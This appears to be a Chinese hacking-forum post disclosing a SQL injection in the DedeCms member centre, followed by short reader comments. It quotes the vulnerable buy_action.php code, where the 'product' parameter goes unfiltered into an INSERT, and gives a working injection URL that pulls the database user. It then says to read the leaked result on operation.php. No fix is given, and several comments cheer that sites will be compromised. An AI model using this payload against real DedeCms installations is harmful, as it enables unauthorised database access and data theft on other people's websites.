DedeCms 会员中心注入漏洞
member/buy_action.php
require_once(dirname(__FILE__)."/config.php");
CheckRank(0,0);
$menutype = 'mydede';
$menutype_son = 'op';
require_once DEDEINC.'/dedetemplate.class.php';
$product = isset($product) ? trim($product) : '';
$mid = $cfg_ml->M_ID;
$ptype = '';
$pname = '';
$price = '';
$mtime = time();
省略XX行
if(empty($product))
{
ShowMsg("请选择一个产品!", 'javascript:;');
exit();
}
省略xxx行
=if(!isset($paytype))
{
$inquery = "INSERT INTO #@__member_operation(`buyid` , `pname` , `product` , `money` , `mtime` , `pid` , `mid` , `sta` ,`oldinfo`)
VALUES ('$buyid', '$pname', '$product' , '$price' , '$mtime' , '$pid' , '$mid' , '0' , '$ptype');//product没有过滤
";
echo $inquery."<br>" ;注册用户之后验证邮箱完了之后 打开
127.0.0.1/dedecms/member/buy_action.php?product=1',1,2,3,4,5,@`'`),((select user()),(select 1),'4
然后在http://127.0.0.1/dedecms/member/operation.php
就可以查看到返回信息了
关于作者
评论114次
再来几个这样 以后dede就流弊了,
dede 很不安全啊
dede 伤不起
已经xi惯了,若是看不到dede那才怪了,都玩烂了的
通杀的话 现在很多都没会员功能了
牛逼到极点了。
当年的筛子。。。现在有多新孔了。。
感谢分享!
Dedecms 一批接着一批
dede危险啊,不敢用了
收下了! 谢谢
dedecms总是受害者,这次估计又要一批网站被挂了
织梦的好多洞啊。
dede的太多了 做好加固 不然被爆菊了
放过我可怜的dede吧。嘎嘎,出一个版本爆一个版本
这种好东西谢谢分享啊
代码越是多,出错的概率越是高。可怜的dede
牛!!!!!!!!
过来瞅瞅~.gif)
waf现在太多了,站长也都变聪明了,至少安全钩。